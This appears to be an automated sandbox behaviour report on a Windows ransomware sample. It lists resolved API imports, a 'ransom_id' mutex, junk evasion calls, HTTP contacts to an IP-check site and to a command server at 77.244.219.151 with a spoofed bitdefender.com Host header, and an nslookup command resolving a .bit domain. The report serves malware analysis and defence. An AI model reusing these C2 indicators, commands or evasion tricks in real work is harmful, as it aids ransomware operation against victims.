Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x7413a6e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x74146aa0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x76ee0e60 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x7413a740 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x7413a720 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x74146ca0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x74139b00 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x741338a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x741323e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x74137620 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x7413aac0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x7413a7e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x7413b0b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x74139bf0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x74162670 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x7413a940 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x74146730 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x741338c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x7413a120 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x74131b70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x741329d0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x7413a040 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x74139bc0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x76ecf290 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x76ecf210 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x74131ba0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x7413a790 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x74138500 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x74145140 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x7413a290 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x74137930 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x74138c10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x741619a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x76ec2bd0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x76ebefe0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x74137950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x76ebbb20 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x74139f30 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x741469b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x74146f60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x74146f70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x74146890 True 2
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x6f98c544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x74146740 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x741466a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x74146700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x7413b040 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x7413ace0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x76ed7dc0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x76ee4010 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x76ee2a50 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x7413a7b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x76ee2290 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x76ee2910 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x76f07a60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x76efac00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x76eea890 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x7413ac80 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x74160830 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x767f6270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x7413fe80 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x7413ff80 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x74160e00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x7413a750 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x74161240 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x7413ad60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x74161460 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x74139a10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x7677ded0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x74133630 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x74146bb0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x74146c40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileAttributesW, address_out = 0x74146a50 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x7413b1d0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x7415d260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileAttributesW, address_out = 0x74146c20 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexW, address_out = 0x741466f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeW, address_out = 0x74146a10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VerSetConditionMask, address_out = 0x76ef1a40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x74146820 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x74145eb0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSection, address_out = 0x76eea200 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemDirectoryW, address_out = 0x74139fd0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateThread, address_out = 0x74140160 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VerifyVersionInfoW, address_out = 0x74138c30 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForMultipleObjects, address_out = 0x74146800 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExpandEnvironmentStringsW, address_out = 0x7413cd50 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x74133690 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetHandleInformation, address_out = 0x74146660 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x7413f640 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreatePipe, address_out = 0x74130540 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpiA, address_out = 0x74137830 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x7413d290 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x74147b50 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x74146960 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x74137970 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x741468e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x741469a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetNativeSystemInfo, address_out = 0x7413ac70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x741446a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDiskFreeSpaceW, address_out = 0x741469f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetWindowsDirectoryW, address_out = 0x74145120 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVolumeInformationW, address_out = 0x74146b60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpiW, address_out = 0x74137590 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x74139b90 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x7415d170 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileMappingW, address_out = 0x741399b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnmapViewOfFile, address_out = 0x74139b20 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MapViewOfFile, address_out = 0x74138d60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSize, address_out = 0x74146a70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableW, address_out = 0x74139970 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x7413ea30 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x741399f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x7413f5a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTempPathW, address_out = 0x74146b30 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x74138c80 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x7413b000 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BeginPaint, address_out = 0x76878a60 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfW, address_out = 0x7686f890 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x7685d9b0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x7685abd0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadIconW, address_out = 0x7685a740 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x768bfec0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x76874f60 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x76878a80 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x768792b0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x76859580 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x76878e60 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x76859860 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x76855d90 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x768562e0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x76f1aee0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x768683a0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfA, address_out = 0x768704a0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetForegroundWindow, address_out = 0x76878cb0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetWindowLongW, address_out = 0x76853780 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = TextOutW, address_out = 0x76588830 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = FreeSid, address_out = 0x76de0440 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x76ddf7f0 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExW, address_out = 0x76ddfa20 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x76ddf620 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptExportKey, address_out = 0x76ddfb30 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x76de0590 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetKeyParam, address_out = 0x76df6bf0 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x76de0650 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x76ddfaf0 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x76df6b30 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGenKey, address_out = 0x76de3910 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyKey, address_out = 0x76de0400 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x76de1030 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x76ddf330 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x76ddf350 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = AllocateAndInitializeSid, address_out = 0x76ddf660 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteW, address_out = 0x7527d9f0 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderPathW, address_out = 0x7528f9c0 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x7527e690 True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x74c6d6d0 True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptBinaryToStringA, address_out = 0x74c6e0f0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x6fe8d200 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpAddRequestHeadersW, address_out = 0x6fe3bec0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpSendRequestW, address_out = 0x6fe86ef0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetConnectW, address_out = 0x6fe745f0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpOpenRequestW, address_out = 0x6fe40fd0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x6fe88490 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x6fe47320 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumDeviceDrivers, address_out = 0x74561340 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = GetDeviceDriverBaseNameW, address_out = 0x745613a0 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = RtlComputeCrc32, address_out = 0x76f5d9b0 True 5
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGenRandom, address_out = 0x76de10a0 True 701
Fn
Driver (253)
Operation Driver Additional Information Success Count Logfile
Enumerate - load_addresses = 1703688 True 2
Fn
Enumerate - load_addresses = 4784128 True 2
Fn
Window (249)
Operation Window Name Additional Information Success Count
Find vetigisoliwomo ki class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga False 249
System (11)
Operation Additional Information Success Count
Get Computer Name result_out = X2VS1CUM True 1
Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Sleep duration = -1 (infinite) False 1
Get Time type = System Time, time = 2018-03-14 01:01:16 (UTC) True 1
Get Time type = Ticks, time = 95218 True 1
Get Time type = Ticks, time = 102843 True 1
Get Info type = Operating System True 1
Get Info type = Windows Directory, result_out = C:\Windows True 3
Get Info type = Hardware Information True 1
Mutex (1)
Operation Additional Information Success Count
Create mutex_name = Global\pc_group=WORKGROUP&ransom_id=58de2295a283c81 True 1
Environment (252)
Operation Additional Information Success Count
Get Environment String - True 2
Get Environment String name = AppData, result_out = C:\Users\Nd9E1FYi\AppData\Roaming True 1
Set Environment String name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo True 249
Ini (250)
Operation Filename Additional Information Success Count
Read Section Win.ini section_name = hozavofoja xewuwozeyugisehatuzagito cuheleta tofexu, data_out = ˆeìvHÈÚhH False 250
Network Behavior
HTTP Sessions (2)
Information Value
Total Data Sent 580 bytes
Total Data Received 566 bytes
Contacted Host Count 2
Contacted Hosts ipv4bot.whatismyipaddress.com, 77.244.219.151
HTTP Session #1
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name ipv4bot.whatismyipaddress.com
Server Port 80
Data Sent 295
Data Received 14
Operation Additional Information Success Count
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Open Connection protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 True 1
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Add HTTP Request Headers headers = Host: bitdefender.com True 1
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ True 1
Read Response size = 10238, size_out = 14 True 1
Read Response size = 10238, size_out = 0 True 1
Close Session - True 4
HTTP Session #2
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name 77.244.219.151
Server Port 80
Data Sent 285
Data Received 552
Operation Additional Information Success Count
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Open Connection protocol = HTTP, server_name = 77.244.219.151, server_port = 80 True 1
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = eighph?soref=eezaui, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Add HTTP Request Headers headers = Host: bitdefender.com True 1
Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 77.244.219.151/eighph?soref=eezaui True 1
Read Response size = 204798, size_out = 552 True 1
Read Response size = 204798, size_out = 0 True 1
Close Session - True 4
Process #22: nslookup.exe
8 17
Information Value
ID #22
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup politiaromana.bit ns1.virmach.ru
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:05, Reason: Child Process
Unmonitor End Time: 00:03:23, Reason: Terminated by Timeout
Monitor Duration 00:00:18
OS Process Information
Information Value
PID 0xd48
Parent PID 0xcf0 (c:\users\nd9e1fyi\appdata\roamingqtp35.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0xA10
0xD34
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x00021fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000030000 0x00030000 0x00044fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
nslookup.exe 0x00070000 0x00086fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000090000 0x00090000 0x0408ffff Pagefile Backed Memory - True False False -
private_0x0000000004090000 0x04090000 0x04091fff Private Memory Readable, Writable True False False -
private_0x0000000004090000 0x04090000 0x04093fff Private Memory Readable, Writable True False False -
private_0x00000000040a0000 0x040a0000 0x040dffff Private Memory Readable, Writable True False False -
private_0x00000000040e0000 0x040e0000 0x0411ffff Private Memory Readable, Writable True False False -
private_0x0000000004120000 0x04120000 0x04121fff Private Memory Readable, Writable True False False -
locale.nls 0x04130000 0x041edfff Memory Mapped File Readable False False False -
pagefile_0x00000000041f0000 0x041f0000 0x041f0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000004200000 0x04200000 0x043fffff Private Memory Readable, Writable True False False -
private_0x0000000004400000 0x04400000 0x0443ffff Private Memory Readable, Writable True False False -
private_0x0000000004440000 0x04440000 0x0447ffff Private Memory Readable, Writable True False False -
imm32.dll 0x04480000 0x044a9fff Memory Mapped File Readable False False False -
private_0x0000000004480000 0x04480000 0x04480fff Private Memory Readable, Writable True False False -
private_0x0000000004490000 0x04490000 0x04490fff Private Memory Readable, Writable True False False -
private_0x0000000004540000 0x04540000 0x0454ffff Private Memory Readable, Writable True False False -
private_0x0000000004600000 0x04600000 0x046fffff Private Memory Readable, Writable True False False -
private_0x0000000004860000 0x04860000 0x0486ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000004870000 0x04870000 0x049f7fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000004a00000 0x04a00000 0x04b80fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000004b90000 0x04b90000 0x05f8ffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000005f90000 0x05f90000 0x0638afff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x06390000 0x066c6fff Memory Mapped File Readable False False False -
wow64win.dll 0x542b0000 0x54329fff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x54330000 0x5437ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x54380000 0x54387fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x6f440000 0x6f44afff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x6f450000 0x6f463fff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x6f470000 0x6f485fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x6f490000 0x6f4a1fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x71540000 0x71586fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x71590000 0x71597fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x715a0000 0x715cefff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x715d0000 0x71653fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x71660000 0x716aefff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x73860000 0x7387afff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x73bb0000 0x73bb9fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x73bc0000 0x73bddfff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x73be0000 0x73be6fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x740c0000 0x7411efff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74120000 0x741fffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x74300000 0x743bdfff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x74530000 0x7455afff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74610000 0x746bcfff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x74fd0000 0x75027fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75090000 0x750d3fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x764e0000 0x7662efff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x766c0000 0x7683dfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x76840000 0x76986fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x76e90000 0x7700afff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007f8c0000 0x7f8c0000 0x7f9bffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007f9c0000 0x7f9c0000 0x7f9e2fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7df9abbfffff Private Memory Readable True False False -
pagefile_0x00007df9abc00000 0x7df9abc00000 0x7ff9abbfffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ff9abc00000 0x7ff9abdc0fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ff9abdc1000 0x7ff9abdc1000 0x7ffffffeffff Private Memory Readable True False False -
Host Behavior
Registry (7)
Operation Key Additional Information Success Count
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient - False 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DNSLookupOrder False 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = Domain True 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpDomain False 1
